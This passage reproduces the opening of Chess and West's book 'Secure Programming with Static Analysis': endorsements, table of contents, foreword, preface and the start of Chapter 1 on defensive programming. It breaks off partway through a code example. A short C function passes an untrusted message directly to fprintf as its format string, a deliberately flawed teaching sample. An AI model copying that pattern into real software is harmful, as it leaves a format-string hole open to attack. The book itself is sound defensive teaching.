超过460,000+ 应用技术资源下载

Secure Programming with Static Analysis.pdf

  • 1星
  • 日期: 2014-06-13
  • 大小: 4.71MB
  • 所需积分:1分
  • 下载次数:1
  • favicon收藏
  • rep举报
  • 分享
  • free评论
标签: SecureProgrammingwithStaticAnalysis

Secure Programming with Static Analysis.pdf

Praise for Secure Programming with Static Analysis “We designed Java so that it could be analyzed statically. This book shows you how to apply advanced static analysis techniques to create more secure, more reliable software.” —Bill Joy Co-founder of Sun Microsystems, co-inventor of the Java programming language “If you want to learn how promising new code-scanning tools can improve the security of your software, then this is the book for you. The first of its kind, Secure Programming with Static Analysis is well written and tells you what you need to know without getting too bogged down in details. This book sets the standard.” —David Wagner Associate Professor, University of California, Berkeley “Brian and Jacob can write about software security from the ‘been there. done that.’ perspective. Read what they’ve written - it’s chock full of good advice.” —Marcus Ranum Inventor of the firewall, Chief Scientist, Tenable Security “Over the past few years, we’ve seen several books on software security hitting the bookstores, including my own. While they’ve all provided their own views of good software security practices, this book fills a void that none of the others have covered. The authors have done a magnificent job at describing in detail how to do static source code analysis using all the tools and technologies available today. Kudos for arming the developer with a clear understanding of the topic as well as a wealth of practical guidance on how to put that understanding into practice. It should be on the required reading list for anyone and everyone developing software today.” —Kenneth R. van Wyk President and Principal Consultant, KRvW Associates, LLC. “Software developers are the first and best line of defense for the security of their code. This book gives them the security development knowledge and the tools they need in order to eliminate vulnerabilities before they move into the final products that can be exploited.” —Howard A. Schmidt Former White House Cyber Security Advisor “Modern artifacts are built with computer assistance. You would never think to build bridges, tunnels, or airplanes without the most sophisticated, state of the art tools. And yet, for some reason, many programmers develop their software without the aid of the best static analysis tools. This is the primary reason that so many software systems are replete with bugs that could have been avoided. In this exceptional book, Brian Chess and Jacob West provide an invaluable resource to programmers. Armed with the hands-on instruction provided in Secure Programming with Static Analysis, developers will finally be in a position to fully utilize technological advances to produce better code. Reading this book is a prerequisite for any serious programming.” —Avi Rubin, Ph.D. Professor of Computer Science, Johns Hopkins University President and co-Founder, Independent Security Evaluators “Once considered an optional afterthought, application security is now an absolute requirement. Bad guys will discover how to abuse your software in ways you’ve yet to imagine—costing your employer money and damaging its reputation. Brian Chess and Jacob West offer timely and salient guidance to design security and resiliency into your applications from the very beginning. Buy this book now and read it tonight.” —Steve Riley Senior Security Strategist, Trustworthy Computing, Microsoft Corporation “Full of useful code examples, this book provides the concrete, technical details you need to start writing secure software today. Security bugs can be difficult to find and fix, so Chess and West show us how to use static analysis tools to reliably find bugs and provide code examples demonstrating the best ways to fix them. Secure Programming with Static Analysis is an excellent book for any software engineer and the ideal code-oriented companion book for McGraw’s process-oriented Software Security in a software security course.” —James Walden Assistant Professor of Computer Science, Northern Kentucky University “Brian and Jacob describe the root cause of many of today’s most serious security issues from a unique perspective: static source code analysis. Using lots of real-world source code examples combined with easy-to-understand theoretical analysis and assessment, this book is the best I’ve read that explains code vulnerabilities in such a simple yet practical way for software developers.” —Dr. Gang Cheng “Based on their extensive experience in both the software industry and academic research, the authors illustrate sound software security practices with solid principles. This book distinguishes itself from its peers by advocating practical static analysis, which I believe will have a big impact on improving software security.” —Dr. Hao Chen Assistant Professor of Computer Science, UC Davis Secure Programming with Static Analysis Addison-Wesley Software Security Series Gary McGraw, Consulting Editor Titles in the Series Secure Programming with Static Analysis, by Brian Chess and Jacob West ISBN: 0-321-42477-8 Exploiting Software: How to Break Code, by Greg Hoglund and Gary McGraw ISBN: 0-201-78695-8 Exploiting Online Games: Cheating Massively Distributed Systems, by Greg Hoglund and Gary McGraw ISBN: 0-132-27191-5 Rootkits: Subverting the Windows Kernel, by Greg Hoglund and James Butler ISBN: 0-321-29431-9 Software Security: Building Security In, by Gary McGraw ISBN: 0-321-35670-5 For more information about these titles, and to read sample chapters, please visit the series web site at Secure Programming with Static Analysis Brian Chess Jacob West Upper Saddle River, NJ • Boston • Indianapolis • San Francisco New York • Toronto • Montreal • London • Munich • Paris • Madrid Cape Town • Sydney • Tokyo • Singapore • Mexico City Many of the designations used by manufacturers and sellers to distinguish their products are claimed as trademarks. Where those designations appear in this book, and the publisher was aware of a trademark claim, the designations have been printed with initial capital letters or in all capitals. The authors and publisher have taken care in the preparation of this book, but make no expressed or implied warranty of any kind and assume no responsibility for errors or omissions. No liability is assumed for incidental or consequential damages in connection with or arising out of the use of the information or programs contained herein. The publisher offers excellent discounts on this book when ordered in quantity for bulk purchases or special sales, which may include electronic versions and/or custom covers and content particular to your business, training goals, marketing focus, and branding interests. For more information, please contact: U.S. Corporate and Government Sales (800) 382-3419 For sales outside the United States, please contact: International Sales Visit us on the Web: Library of Congress Cataloging-in-Publication Data: Chess, Brian. Secure programming with static analysis / Brian Chess. p. cm. Includes bibliographical references and index. ISBN 0-321-42477-8 1. Computer security. 2. Debugging in computer science. 3. Computer software—Quality control. I. Title. QA76.9.A25C443 2007 005.8—dc22 2007010226 Copyright © 2007 Pearson Education, Inc. All rights reserved. Printed in the United States of America. This publication is protected by copyright, and permission must be obtained from the publisher prior to any prohibited reproduction, storage in a retrieval system, or transmission in any form or by any means, electronic, mechanical, photocopying, recording, or likewise. For information regarding permissions, write to: Pearson Education, Inc. Rights and Contracts Department 75 Arlington Street, Suite 300 Boston, MA 02116 Fax: (617) 848-7047 ISBN 0-321-42477-8 Text printed in the United States on recycled paper at R. R. Donnelley in Crawfordsville, Indiana. First printing, June 2007 To Sally and Simon, with love. —Brian In memory of the best teacher I ever had, my Dad. —Jacob This page intentionally left blank Contents Part I: Software Security and Static Analysis 1 1 The Software Security Problem 3 1.1 Defensive Programming Is Not Enough 4 1.2 Security Features != Secure Features 6 1.3 The Quality Fallacy 9 1.4 Static Analysis in the Big Picture 11 1.5 Classifying Vulnerabilities 14 The Seven Pernicious Kingdoms 15 1.6 Summary 19 2 Introduction to Static Analysis 21 2.1 Capabilities and Limitations of Static Analysis 22 2.2 Solving Problems with Static Analysis 24 Type Checking 24 Style Checking 26 Program Understanding 27 Program Verification and Property Checking 28 Bug Finding 32 Security Review 33 2.3 A Little Theory, a Little Reality 35 Success Criteria 36 Analyzing the Source vs. Analyzing Compiled Code 42 Summary 45 ix x Contents 3 Static Analysis as Part of the Code Review Process 47 3.1 Performing a Code Review 48 The Review Cycle 48 Steer Clear of the Exploitability Trap 54 3.2 Adding Security Review to an Existing Development Process 56 Adoption Anxiety 58 Start Small, Ratchet Up 62 3.3 Static Analysis Metrics 62 Summary 69 4 Static Analysis Internals 71 4.1 Building a Model 72 Lexical Analysis 72 Parsing 73 Abstract Syntax 74 Semantic Analysis 76 Tracking Control Flow 77 Tracking Dataflow 80 Taint Propagation 82 Pointer Aliasing 82 4.2 Analysis Algorithms 83 Checking Assertions 84 Naïve Local Analysis 85 Approaches to Local Analysis 89 Global Analysis 91 Research Tools 94 4.3 Rules 96 Rule Formats 97 Rules for Taint Propagation 101 Rules in Print 103 4.4 Reporting Results 105 Grouping and Sorting Results 106 Eliminating Unwanted Results 108 Explaining the Significance of the Results 109 Summary 113 Contents xi Part II: Pervasive Problems 115 5 Handling Input 117 5.1 What to Validate 119 Validate All Input 120 Validate Input from All Sources 121 Establish Trust Boundaries 130 5.2 How to Validate 132 Use Strong Input Validation 133 Avoid Blacklisting 137 Don’t Mistake Usability for Security 142 Reject Bad Data 143 Make Good Input Validation the Default 144 Check Input Length 153 Bound Numeric Input 157 5.3 Preventing Metacharacter Vulnerabilities 160 Use Parameterized Requests 161 Path Manipulation 167 Command Injection 168 Log Forging 169 Summary 172 6 Buffer Overflow 175 6.1 Introduction to Buffer Overflow 176 Exploiting Buffer Overflow Vulnerabilities 176 Buffer Allocation Strategies 179 Tracking Buffer Sizes 186 6.2 Strings 189 Inherently Dangerous Functions 189 Bounded String Operations 195 Common Pitfalls with Bounded Functions 203 Maintaining the Null Terminator 213 Character Sets, Representations, and Encodings 218 Format Strings 224 Better String Classes and Libraries 229 Summary 233 xii Contents 7 Bride of Buffer Overflow 235 7.1 Integers 236 Wrap-Around Errors 236 Truncation and Sign Extension 239 Conversion between Signed and Unsigned 241 Methods to Detect and Prevent Integer Overflow 242 7.2 Runtime Protection 251 Safer Programming Languages 251 Safer C Dialects 255 Dynamic Buffer Overflow Protections 258 Dynamic Protection Benchmark Results 263 Summary 263 8 Errors and Exceptions 265 8.1 Handling Errors with Return Codes 266 Checking Return Values in C 266 Checking Return Values in Java 269 8.2 Managing Exceptions 271 Catch Everything at the Top Level 272 The Vanishing Exception 273 Catch Only What You’re Prepared to Consume 274 Keep Checked Exceptions in Check 276 8.3 Preventing Resource Leaks 278 C and C++ 279 Java 283 8.4 Logging and Debugging 286 Centralize Logging 286 Keep Debugging Aids and Back-Door Access Code out of Production 289 Clean Out Backup Files 292 Do Not Tolerate Easter Eggs 293 Summary 294 Contents xiii Part III: Features and Flavors 295 9 Web Applications 297 9.1 Input and Output Validation for the Web 298 Expect That the Browser Has Been Subverted 299 Assume That the Browser Is an Open Book 302 Protect the Browser from Malicious Content 303 9.2 HTTP Considerations 319 Use POST, Not GET 319 Request Ordering 322 Error Handling 322 Request Provenance 327 9.3 Maintaining Session State 328 Use Strong Session Identifiers 329 Enforce a Session Idle Timeout and a Maximum Session Lifetime 331 Begin a New Session upon Authentication 333 9.4 Using the Struts Framework for Input Validation 336 Setting Up the Struts Validator 338 Use the Struts Validator for All Actions 338 Validate Every Parameter 342 Maintain the Validation Logic 343 Summary 346 10 XML and Web Services 349 10.1 Working with XML 350 Use a Standards-Compliant XML Parser 350 Turn on Validation 352 Be Cautious about External References 358 Keep Control of Document Queries 362 10.2 Using Web Services 366 Input Validation 366 WSDL Worries 368 Over Exposure 369 New Opportunities for Old Errors 370 JavaScript Hijacking: A New Frontier 370 Summary 376 xiv 11 Privacy and Secrets 379 11.1 Privacy and Regulation 380 Identifying Private Information 380 Handling Private Information 383 11.2 Outbound Passwords 388 Keep Passwords out of Source Code 389 Don’t Store Clear-Text Passwords 391 11.3 Random Numbers 397 Generating Random Numbers in Java 398 Generating Random Numbers in C and C++ 401 11.4 Cryptography 407 Choose a Good Algorithm 407 Don’t Roll Your Own 409 11.5 Secrets in Memory 412 Minimize Time Spent Holding Secrets 414 Share Secrets Sparingly 415 Erase Secrets Securely 416 Prevent Unnecessary Duplication of Secrets 418 Summary 420 12 Privileged Programs 421 12.1 Implications of Privilege 423 Principle of Least Privilege 423 This Time We Mean It: Distrust Everything 426 12.2 Managing Privilege 427 Putting Least Privilege into Practice 427 Restrict Privilege on the Filesystem 433 Beware of Unexpected Events 436 12.3 Privilege Escalation Attacks 439 File Access Race Conditions 440 Insecure Temporary Files 446 Command Injection 450 Standard File Descriptors 452 Summary 454 Contents Contents xv Part IV: Static Analysis in Practice 457 13 Source Code Analysis Exercises for Java 459 Exercise 13.0 Installation 460 Exercise 13.1 Begin with the End in Mind 461 Exercise 13.2 Auditing Source Code Manually 469 Exercise 13.3 Running Fortify SCA 471 Exercise 13.4 Understanding Raw Analysis Results 472 Exercise 13.5 Analyzing a Full Application 478 Exercise 13.6 Tuning Results with Audit Workbench 479 Exercise 13.7 Auditing One Issue 483 Exercise 13.8 Performing a Complete Audit 487 Exercise 13.9 Writing Custom Rules 491 Answers to Questions in Exercise 13.2 499 14 Source Code Analysis Exercises for C 503 Exercise 14.0 Installation 504 Exercise 14.1 Begin with the End in Mind 505 Exercise 14.2 Auditing Source Code Manually 513 Exercise 14.3 Running Fortify SCA 514 Exercise 14.4 Understanding Raw Analysis Results 515 Exercise 14.5 Analyzing a Full Application 520 Exercise 14.6 Tuning Results with Audit Workbench 521 Exercise 14.7 Auditing One Issue 525 Exercise 14.8 Performing a Complete Audit 529 Exercise 14.9 Writing Custom Rules 531 Answers to Questions in Exercise 14.2 537 Epilogue 541 References 545 Index 559 This page intentionally left blank Foreword Software Security and Code Review with a Static Analysis Tool On the first day of class, mechanical engineers learn a critical lesson: Pay attention and learn this stuff, or the bridge you build could fall down. This lesson is most powerfully illustrated by a video of the Tacoma Narrows Bridge shaking itself to death ( tacoma.html). Figure 1 shows a 600-foot section of the bridge falling into the water in 1940. By contrast, on the first day of software engineering class, budding developers are taught that they can build anything that they can dream of. They usually start with “hello world.” Figure 1 A 600-foot section of the Tacoma Narrows bridge crashes into Puget Sound as the bridge twists and torques itself to death. Mechanical engineers are warned early on that this can happen if they don’t practice good engineering. xvii xviii Foreword An overly optimistic approach to software development has certainly led to the creation of some mind-boggling stuff, but it has likewise allowed us to paint ourselves into the corner from a security perspective. Simply put, we neglected to think about what would happen to our software if it were intentionally and maliciously attacked. Much of today’s software is so fragile that it barely functions properly when its environment is pristine and predictable. If the environment in which our fragile software runs turns out to be pugnacious and pernicious (as much of the Internet environment turns out to be), software fails spectacularly, splashing into the metaphorical Puget Sound. The biggest problem in computer security today is that most systems aren’t constructed with security in mind. Reactive network technologies such as firewalls can help alleviate obvious script kiddie attacks on servers, but they do nothing to address the real security problem: bad software. If we want to solve the computer security problem, we need to do more to build secure software. Software security is the practice of building software to be secure and function properly under malicious attack. This book is about one of software security’s most important practices: code review with a static analysis tool. As practitioners become aware of software security’s importance, they are increasingly adopting and evolving a set of best practices to address the problem. Microsoft has carried out a noteworthy effort under its Trustworthy Computing Initiative. Many Cigital customers are in the midst of enterprise scale software security initiatives. Most approaches in practice today encompass training for developers, testers, and architects; analysis and auditing of software artifacts; and security engineering. There’s no substitute for working software security as deeply into the development process as possible and taking advantage of the engineering lessons software practitioners have learned over the years. In my book Software Security, I introduce a set of seven best practices called touchpoints. Putting software security into practice requires making some changes to the way most organizations build software. The good news is that these changes don’t need to be fundamental, earth shattering, or costprohibitive. In fact, adopting a straightforward set of engineering best practices, designed in such a way that security can be interleaved into existing development processes, is often all it takes. Figure 2 specifies the software security touchpoints and shows how software practitioners can apply them to the various software artifacts produced during software development. This means understanding how to Foreword xix work security engineering into requirements, architecture, design, coding, testing, validation, measurement, and maintenance. 6 8 SECURITY REQUIREMENTS EXTERNAL REVIEW 5 2 4 RISK-BASED ABUSE RISK SECURITY CASES ANALYSIS TESTS 1 CODE REVIEW (TOOLS) 2 RISK ANALYSIS 3 PENETRATION TESTING 7 SECURITY OPERATIONS REQUIREMENTS ARCHITECTURE AND USE CASES AND DESIGN TEST PLANS CODE TESTS AND TEST RESULTS FEEDBACK FROM THE FIELD Figure 2 The software security touchpoints as introduced and fleshed out in Software Security: Building Security In. Some touchpoints are, by their very nature, more powerful than others. Adopting the most powerful ones first is only prudent. The top two touchpoints are code review with a static analysis tool and architectural risk analysis. This book is all about the first. All software projects produce at least one artifact: code. This fact moves code review to the number one slot on our list. At the code level, the focus is on implementation bugs, especially those that static analysis tools that scan source code for common vulnerabilities can discover. Several tools vendors now address this space, including Fortify Software, the company that Brian and Jacob work for. Implementation bugs are both numerous and common (just like real bugs in the Virginia countryside), and include nasty creatures such as the notorious buffer overflow, which owes its existence to the use (or misuse) of vulnerable APIs (e.g., gets(), strcpy(), and so on in C). Code review processes, both manual and (even more important) automated with a static analysis tool, attempt to identify security bugs prior to the software’s release. xx Foreword Of course, no single technique is a silver bullet. Code review is a necessary but not sufficient practice for achieving secure software. Security bugs (especially in C and C++) are a real problem, but architectural flaws are just as big of a problem. Doing code review alone is an extremely useful activity, but given that this kind of review can only identify bugs, the best a code review can uncover is around 50% of the security problems. Architectural problems are very difficult (and mostly impossible) to find by staring at code. This is especially true for modern systems made of hundreds of thousands of lines of code. A comprehensive approach to software security involves holistically combining both code review and architectural analysis. By its very nature, code review requires knowledge of code. An infosec practitioner with little experience writing and compiling software will be of little use during a code review. The code review step is best left in the hands of the members of the development organization, especially if they are armed with a modern source code analysis tool. With the exception of information security people who are highly experienced in programming languages and code-level vulnerability resolution, there is no natural fit for network security expertise during the code review phase. This might come as a great surprise to organizations currently attempting to impose software security on their enterprises through the infosec division. Even though the idea of security enforcement is solid, making enforcement at the code level successful when it comes to code review requires real hands-on experience with code. The problem is that most developers have little idea what bugs to look for, or what to do about bugs if they do find them. That’s where this book, Secure Programming with Static Analysis, comes in. The book that you have in your hands is the most advanced work on static analysis and code review for security ever released. It teaches you not only what the bugs are (what I sometimes call the “bug parade” approach to software security), but how to find them with modern static analysis tools and, more important, what to do to correct them. By putting the lessons in this book into practice, you go a long way toward helping to solve the software security problem. Gary McGraw, Ph.D. Berryville, Virginia March 6, 2007 Company: Podcast: Blog: Book: Preface Following the light of the sun, we left the Old World. —Christopher Columbus We live in a time of unprecedented economic growth, increasingly fueled by computer and communications technology. We use software to automate factories, streamline commerce, and put information into the hands of people who can act upon it. We live in the information age, and software is the primary means by which we tame information. Without adequate security, we cannot realize the full potential of the digital age. But oddly enough, much of the activity that takes place under the guise of computer security isn’t really about solving security problems at all; it’s about cleaning up the mess that security problems create. Virus scanners, firewalls, patch management, and intrusion detection systems are all means by which we make up for shortcomings in software security. The software industry puts more effort into compensating for bad security than it puts into creating secure software in the first place. Do not take this to mean that we see no value in mechanisms that compensate for security failures. Just as every ship should have lifeboats, it is both good and healthy that our industry creates ways to quickly compensate for a newly discovered vulnerability. But the state of software security is poor. New vulnerabilities are discovered every day. In a sense, we’ve come to expect that we will need to use the lifeboats every time the ship sails. Changing the state of software security requires changing the way software is built. This is not an easy task. After all, there are a limitless number of security mistakes that programmers could make! The potential for error might be limitless, but in practice, the programming community tends to repeat the same security mistakes. Almost two decades of buffer overflow vulnerabilities serve as an excellent illustration of this point. In 1988, the Morris worm made the Internet programming community aware that a buffer overflow could lead to a security breach, but as recently as 2004, xxi xxii Preface buffer overflow was the number one cause of security problems cataloged by the Common Vulnerabilities and Exposures (CVE) Project [CWE, 2006]. This significant repetition of well-known mistakes suggests that many of the security problems we encounter today are preventable and that the software community possesses the experience necessary to avoid them. We are thrilled to be building software at the beginning of the twentyfirst century. It must have felt this way to be building ships during the age of exploration. When Columbus came to America, exploration was the driving force behind economic expansion, and ships were the means by which explorers traveled the world. In Columbus’s day, being a world economic power required being a naval power because discovering a new land didn’t pay off until ships could safely travel the new trade routes. Software security has a similar role to play in today’s world. To make information technology pay off, people must trust the computer systems they use. Some pundits warn about an impending “cyber Armageddon,” but we don't fear an electronic apocalypse nearly so much as we see software security as one of the primary factors that control the amount of trust people are willing to place in technology. We believe that it is the responsibility of the people who create software to make sure that their creations are secure. Software security cannot be left to the system administrator or the end user. Network security, judicious administration, and wise use are all important, but in the long run, these endeavors cannot succeed if the software is inherently vulnerable. Although security can sometimes appear to be a black art or a matter of luck, we hope to show that it is neither. Making security sound impossible or mysterious is giving it more than its due. With the right knowledge and the right tools, good software security can be achieved by building security in to the software development process. We sometimes encounter programmers who question whether software security is a worthy goal. After all, if no one hacked your software yesterday, why would you believe they’ll hack it tomorrow? Security requires expending some extra thought, attention, and effort. This extra work wasn’t nearly so important in previous decades, and programmers who haven’t yet suffered security problems use their good fortune to justify continuing to ignore security. In his investigation of the loss of the space shuttle Challenger, Richard Feynman found that NASA had based its risk assessment on the fact that previous shuttle missions had been successful [Feynman, 1986]. They knew anomalous behavior had taken place in the past, but they used the fact that Preface xxiii no disaster had occurred yet as a reason to believe that no disaster would ever occur. The resulting erosion of safety margins made failure almost inevitable. Feynman writes, “When playing Russian roulette, the fact that the first shot got off safely is little comfort for the next.” Secure Programming with Static Analysis Two threads are woven throughout the book: software security and static source code analysis. We discuss a wide variety of common coding errors that lead to security problems, explain the security ramifications of each, and give advice for charting a safe course. Our most common piece of advice eventually found its way into the title of the book: Use static analysis tools to identify coding errors before they can be exploited. Our focus is on commercial software for both businesses and consumers, but our emphasis is on business systems. We won’t get into the details that are critical for building software for purposes that imply special security needs. A lot could be said about the specific security requirements for building an operating system or an electronic voting machine, but we encounter many more programmers who need to know how to build a secure Web site or enterprise application. Above all else, we hope to offer practical and immediately practicable advice for avoiding software security pitfalls. We use dozens of real-world examples of vulnerable code to illustrate the pitfalls we discuss, and the book includes a static source code analysis tool on a companion CD so that readers can experiment with the detection techniques we describe. The book is not a guide to using security features, frameworks, or APIs. We do not discuss the Java Security Manager, advanced cryptographic techniques, or the right approach to identity management. Clearly, these are important topics. They are so important, in fact, that they warrant books of their own. Our goal is to focus on things unrelated to security features that put security at risk when they go wrong. In many cases, the devil is in the details. Security principles (and violations of security principles) have to be mapped to their manifestation in source code. We've chosen to focus on programs written in C and Java because they are the languages we most frequently encounter today. We see plenty of other languages, too. Security-sensitive work is being done in C#, Visual Basic, PHP, Perl, Python, Ruby, and COBOL, but it would be difficult to write a single book that could even scratch the surface with all these languages. xxiv Preface In any case, many of the problems we discuss are language independent, and we hope that you will be able to look beyond the syntax of the examples to understand the ramifications for the languages you use. Who Should Read the Book This book is written for people who have decided to make software security a priority. We hope that programmers, managers, and software architects will all benefit from reading it. Although we do not assume any detailed knowledge about software security or static analysis, we cover the subject matter in enough depth that we hope professional code reviewers and penetration testers will benefit, too. We do assume that you are comfortable programming in either C or Java, and that you won’t be too uncomfortable reading short examples in either language. Some chapters are slanted more toward one language than another. For instance, the examples in the chapters on buffer overflow are written in C. How the Book Is Organized The book is divided into four parts. Part I, “Software Security and Static Analysis,” describes the big picture: the software security problem, the way static analysis can help, and options for integrating static analysis as part of the software development process. Part II, “Pervasive Problems,” looks at pervasive security problems that impact software, regardless of its functionality, while Part III, “Features and Flavors,” tackles security concerns that affect common varieties of programs and specific software features. Part IV, “Static Analysis in Practice,” brings together Parts I, II, and III with a set of hands-on exercises that show how static analysis can improve software security. Chapter 1, “The Software Security Problem,” outlines the software security dilemma from a programmer’s perspective: why security is easy to get wrong and why typical methods for catching bugs aren’t very effective when it comes to finding security problems. Chapter 2, “Introduction to Static Analysis,” looks at the variety of problems that static analysis can solve, including structure, quality, and, of course, security. We take a quick tour of open source and commercial static analysis tools. Chapter 3, “Static Analysis as Part of Code Review,” looks at how static analysis tools can be put to work as part of a security review process. We Preface xxv examine the organizational decisions that are essential to making effective use of the tools. We also look at metrics based on static analysis output. Chapter 4, “Static Analysis Internals,” takes an in-depth look at how static analysis tools work. We explore the essential components involved in building a tool and consider the trade-offs that tools make to achieve good precision and still scale to analyze millions of lines of code. Part II outlines security problems that are pervasive in software. Throughout the chapters in this section and the next, we give positive guidance for secure programming and then use specific code examples (many of them from real programs) to illustrate pitfalls to be avoided. Along the way, we point out places where static analysis can help. Chapter 5, “Handling Input,” addresses the most thorny software security topic that programmers have faced in the past, and the one they are most likely to face in the future: handling the many forms and flavors of untrustworthy input. Chapter 6, “Buffer Overflow,” and Chapter 7, “Bride of Buffer Overflow,” look at a single input-driven software security problem that has been with us for decades: buffer overflow. Chapter 6 begins with a tactical approach: how to spot the specific code constructs that are most likely to lead to an exploitable buffer overflow. Chapter 7 examines indirect causes of buffer overflow, such as integer wrap-around. We then step back and take a more strategic look at buffer overflow and possible ways that the problem can be tamed. Chapter 8, “Errors and Exceptions,” addresses the way programmers think about unusual circumstances. Although errors and exceptions are only rarely the direct cause of security vulnerabilities, they are often related to vulnerabilities in an indirect manner. The connection between unexpected conditions and security problems is so strong that error handling and recovery will always be a security topic. At the end, the chapter discusses general approaches to logging and debugging, which is often integrally connected with error handling. Part III uses the same style of positive guidance and specific code examples to tackle security concerns found in common types of programs and related to specific software features. Chapter 9, “Web Applications,” looks at the most popular security topic of the day: the World Wide Web. We look at security problems that are specific to the Web and to the HTTP protocol. xxvi Preface Chapter 10, “XML and Web Services,” examines a security challenge on the rise: the use of XML and Web Services to build applications out of distributed components. Although security features are not our primary focus, some security features are so error prone that they deserve special treatment. Chapter 11, “Privacy and Secrets,” looks at programs that need to protect private information and, more generally, the need to maintain secrets. Chapter 12, “Privileged Programs,” looks at the special security requirements that must be taken into account when writing a program that operates with a different set of privileges than the user who invokes it. Part IV is about gaining experience with static analysis. This book’s companion CD includes a static analysis tool, courtesy of our company, Fortify Software, and source code for a number of sample projects. Chapter 13, “Source Code Analysis Exercises for Java,” is a tutorial that covers static analysis from a Java perspective; Chapter 14, “Source Code Analysis Exercises for C,” does the same thing, but with examples and exercises written in C. Conventions Used in the Book Discussing security errors makes it easy to slip into a negative state of mind or to take a pessimistic outlook. We try to stay positive by focusing on what needs to be done to get security right. Specifics are important, though, so when we discuss programming errors, we try to give a working example that demonstrates the programming mistake under scrutiny. When the solution to a particular problem is far removed from our original example, we also include a rewritten version that corrects the problem. To keep the examples straight, we use an icon to denote code that intentionally contains a weakness: We use a different icon to denote code where the weakness has been corrected: Other conventions used in the book include a monospaced font for code, both in the text and in examples. Acknowledgments Our editor at Addison-Wesley, Jessica Goldstein, has done more than just help us navigate the publishing process; a conversation with her at RSA 2005 got this project started. The rest of the crew at Addison-Wesley has been a great help (and very patient), too: Kristin Weinberger, Chris Zahn, Romny French, and Karen Gettman among others. Portions of Chapters 1, 2, and 3 have their roots in technical papers and journal articles we’ve written in the last few years. We are grateful to our coauthors on those projects: Gary McGraw, Yekaterina Tsipenyuk O’Neil, Pravir Chandra, and John Steven. Our reviewers suffered through some really rough rough drafts and always came back with constructive feedback. Many thanks to Gary McGraw, David Wagner, Geoff Morrison, Gary Hardy, Sean Fay, Richard Bejtlich, James Walden, Gang Cheng, Fredrick Lee, Steve Riley, and Hao Chen. We also received much-needed encouragement from Fortify’s technical advisory board, including Gary McGraw, Marcus Ranum, Avi Rubin, Fred Schneider, Matt Bishop, Li Gong, David Wagner, Greg Morrisett, Bill Pugh, and Bill Joy. Everyone at Fortify Software has been highly supportive of our work, and a significant amount of their work appears on the book’s companion CD. We are enormously grateful for the support we’ve received. We also owe a huge debit of gratitude to Greg Nelson, who has shaped our views on static analysis. Most of all, we give thanks to our families: Sally and Simon at Brian’s house, and Jonathan at Jacob’s house. It takes a lot of forbearance to live with someone who’s working at a Silicon Valley software company, and putting up with someone who’s writing software and writing a book at the same time is more than saintly. Finally, thanks to our parents. You set us down this road, and we wouldn’t want to be headed anywhere else. xxvii This page intentionally left blank About the Authors Brian Chess is a founder of Fortify Software. He currently serves as Fortify’s Chief Scientist, where his work focuses on practical methods for creating secure systems. Brian holds a Ph.D. in Computer Engineering from the University of California at Santa Cruz, where he studied the application of static analysis to the problem of finding security-relevant defects in source code. Before settling on security, Brian spent a decade in Silicon Valley working at huge companies and small startups. He has done research on a broad set of topics, ranging from integrated circuit design all the way to delivering software as a service. He lives in Mountain View, California. Jacob West manages Fortify Software’s Security Research Group, which is responsible for building security knowledge into Fortify’s products. Jacob brings expertise in numerous programming languages, frameworks, and styles together with knowledge about how real-world systems can fail. Before joining Fortify, Jacob worked with Professor David Wagner at the University of California at Berkeley to develop MOPS (MOdel Checking Programs for Security properties), a static analysis tool used to discover security vulnerabilities in C programs. When he is away from the keyboard, Jacob spends time speaking at conferences and working with customers to advance their understanding of software security. He lives in San Francisco, California. xxix This page intentionally left blank PART I Software Security and Static Analysis Chapter 1 The Software Security Problem 3 Chapter 2 Introduction to Static Analysis 21 Chapter 3 Static Analysis as Part of the Code Review Process 47 Chapter 4 Static Analysis Internals 71 This page intentionally left blank 1 The Software Security Problem Success is foreseeing failure. —Henry Petroski We believe that the most effective way to improve software security is to study past security errors and prevent them from happening in the future. In fact, that is the primary theme of this book. In the following chapters, we look at a variety of programming tasks and examine the common security pitfalls associated with them. Our philosophy is similar to that of Henry Petroski: To build a strong system, you have to understand how the system is likely to fail [Petroski, 1985]. Mistakes are inevitable, but you have a measure of control over your mistakes. Although you can’t have precise knowledge of your next blunder, you can control the set of possibilities. You can also control where, when, and by whom your mistake will be found. This book focuses on finding mistakes that manifest themselves in source code. In particular, it concentrates on mistakes that lead to security problems, which can be both tricky to uncover and costly to ignore. Being aware of common pitfalls might sound like a good way to avoid falling prey to them, but awareness by itself often proves to be insufficient. Children learn the spelling rule “i before e except after c,” but widespread knowledge of the rule does not prevent believe from being a commonly misspelled word. Understanding security is one thing; applying your understanding in a complete and consistent fashion to meet your security goals is quite another. For this reason, we advocate static analysis as a technique for finding common security errors in source code. Throughout the book, we show how static analysis tools can be part of a strategy for getting security right. The term static analysis refers to any process for assessing code without executing it. Static analysis is powerful because it allows for the quick consideration of many possibilities. A static analysis tool can explore a large number of “what if” scenarios without having to go through all the computations 3 4 Chapter 1 The Software Security Problem necessary to execute the code for all the scenarios. Static analysis is particularly well suited to security because many security problems occur in corner cases and hard-to-reach states that can be difficult to exercise by actually running the code. Good static analysis tools provide a fast way to get a consistent and detailed evaluation of a body of code. Advanced static analysis tools are not yet a part of the toolkit that most programmers use on a regular basis. To explain why they should be, we begin by looking at why some commonly used approaches to security typically fail. We discuss defensive programming, software security versus security features, and mistaking software quality efforts for software security efforts. Of course, no single tool or technique will ever provide a complete solution to the security problem by itself. We explain where static analysis fits into the big picture and then end the chapter by categorizing the kinds of mistakes that most often jeopardize software security. 1.1 Defensive Programming Is Not Enough The term defensive programming often comes up in introductory programming courses. Although it is increasingly given a security connotation, historically it has referred only to the practice of coding with the mindset that errors are inevitable and that, sooner or later, something will go wrong and lead to unexpected conditions within the program. Kernighan and Plauger call it “writing the program so it can cope with small disasters” [Kernighan and Plauger, 1981]. Good defensive programming requires adding code to check one’s assumptions. The term defensive programming is apt, particularly in introductory programming courses, because often novice programmers are there own worst enemy; by and large, the defenses serve to reveal logic errors made by the programmer. Good defensive programming makes bugs both easier to find and easier to diagnose. But defensive programming does not guarantee secure software (although the notion of expecting anomalies is very much a step in the right direction). When we talk about security, we assume the existence of an adversary— someone who is intentionally trying to subvert the system. Instead of trying to compensate for typical kinds of accidents (on the part of either the programmer or the user), software security is about creating programs that behave correctly even in the presence of malicious behavior. 1.1 Defensive Programming Is Not Enough 5 Consider the following C function that prints a message to a specified file descriptor without performing any error checking: void printMsg(FILE* file, char* msg) { fprintf(file, msg); } If either argument to this function is null, the program will crash. Programming defensively, we might check to make sure that both input parameters are non-null before printing the message, as follows: void printMsg(FILE* file, char* msg) { if (file == NULL) { logError("attempt to print message to null file"); } else if (msg == NULL) { 